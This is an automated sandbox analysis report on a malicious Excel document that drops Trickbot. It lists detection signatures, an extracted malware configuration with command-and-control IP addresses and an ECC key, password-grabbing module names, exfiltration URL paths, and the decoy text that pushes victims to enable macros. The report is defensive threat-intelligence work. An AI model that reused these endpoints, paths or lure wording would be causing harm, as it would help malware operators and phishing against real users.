Analysis Report SecuriteInfo.com.Heur.31681.20936

Overview

General Information

Sample Name: SecuriteInfo.com.Heur.31681.20936 (renamed file extension from 20936 to xls)
Analysis ID: 403507
MD5: 6f7f78fa1fbe9be8fbe20812658c43aa
SHA1: d3f78f528a797c2e97af9f25e189bc43d98f2eae
SHA256: 4d05d391297e3c4ec1bc4047bd3e104f37123c709797854053966ced43f492fb

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp Malware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net9", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll ReversingLabs: Detection: 32%
Source: C:\Users\user\fndskfnds.dfm ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Heur.31681.xls ReversingLabs: Detection: 12%
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00068300 CryptAcquireContextW, 5_2_00068300
Source: C:\Windows\System32\cmd.exe Code function: 9_2_0000000180083634 CryptUnprotectData, 9_2_0000000180083634

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW, 5_2_00062E60
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00063B00 FindFirstFileW, 5_2_00063B00

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: netmouser[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00073460
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx edx, word ptr [eax] 5_2_00062E60
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_000792A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_000756D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, word ptr [eax+02h] 5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00079010
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00082890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 5_2_000784A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_000784A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 5_2_000744D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_000744D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073CFF
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 5_2_00074D36
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073D6F
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073D8D
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_0006A990
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073DAF
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_000801D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073DDB
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073DF6
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then call 000619E0h 5_2_000671F0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 5_2_0007B1F0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ecx 5_2_0006D600
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00070E00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov esi, esi 5_2_00073E15
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 5_2_0006E640
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_0006E250
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp dword ptr [eax], ecx 5_2_0006D6A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec edi 5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00070F00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 5_2_00068750
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 5_2_00082BA0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ebp 5_2_000783F0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: deluciaspizza.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 144.208.70.30:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.22:49170 -> 188.18.7.133:447
May check the online IP address of the machine
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Source: C:\Windows\System32\wermgr.exe DNS query: name: api.ipify.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.18.7.133:447
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.102.220.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ROSTELECOM-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 117.54.250.246:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 117.54.250.246
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: unknown TCP traffic detected without corresponding DNS query: 188.18.7.133
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7EF8415A.emf
Source: global traffic HTTP traffic detected: GET /?format=text HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.74.0Host: api.ipify.org
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: deluciaspizza.com
Source: unknown HTTP traffic detected: POST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBNConnection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.102.220.50:443Content-Length: 282Cache-Control: no-cache
Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp String found in binary or memory: http://103.102.220.50:443
Source: wermgr.exe, 00000005.00000002.2374904504.0000000032C30000.00000004.00000040.sdmp String found in binary or memory: http://103.102.220.50:443Edge
Source: wermgr.exe, 00000005.00000002.2374629363.0000000031844000.00000004.00000040.sdmp String found in binary or memory: http://103.102.220.50:443W6
Source: wermgr.exe, 00000005.00000003.2180328107.0000000031844000.00000004.00000040.sdmp String found in binary or memory: http://103.102.220.50:443X6
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://115.241.244.185:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://177.84.63.252:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://185.119.120.213:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://189.195.96.238:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://190.89.3.117:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://36.95.27.243:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://5.202.120.150:443
Source: wermgr.exe, 00000005.00000003.2169013545.0000000031E3E000.00000004.00000040.sdmp String found in binary or memory: http://83.220.115.230:443
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.c
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en&
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabl
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wermgr.exe, 00000005.00000002.2376017497.0000000033720000.00000002.00000001.sdmp, taskeng.exe, 00000007.00000002.2368215983.00000000008C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2106026535.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104880934.00000000009E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368386646.0000000000967000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/
Source: wermgr.exe, 00000005.00000002.2370271549.0000000000320000.00000004.00000020.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/10/62/DTJZZVZHXNDTX/1/in
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/14/NAT%20status/client%2
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/dpost/
Source: wermgr.exe, 00000005.00000002.2375741544.0000000033395000.00000004.00000001.sdmp, wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DEBG//
Source: wermgr.exe, 00000005.00000002.2375793924.000000003339B000.00000004.00000001.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/DPST//
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp String found in binary or memory: https://117.54.250.246/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/64/pwgrabb/VERS//
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabb64/k
Source: wermgr.exe, 00000005.00000002.2375672021.000000003336F000.00000004.00000001.sdmp String found in binary or memory: https://188.18.7.133:447/net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/5/pwgrabc64/O
Source: wermgr.exe, 00000005.00000002.2370149223.00000000002BD000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown HTTPS traffic detected: 144.208.70.30:443 -> 192.168.2.22:49165 version: TLS 1.2

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 1776, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 Protected View
Source: Screenshot number: 4 Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start I ' ' ' 18 the decryption of
Source: Document image extraction number: 2 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3 Screenshot OCR: Enable Content
Source: Document image extraction number: 4 Screenshot OCR: Enable Editing
Source: Document image extraction number: 13 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13 Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Heur.31681.xls Initial sample: CALL
Source: SecuriteInfo.com.Heur.31681.xls Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\fndskfnds.dfm
Abnormal high CPU Usage
Source: C:\Windows\System32\wermgr.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00073410 NtDelayExecution, 5_2_00073410
Source: C:\Windows\System32\wermgr.exe Code function: 5_2_00067C30 NtQueryInformationProcess, 5_2_00067C30
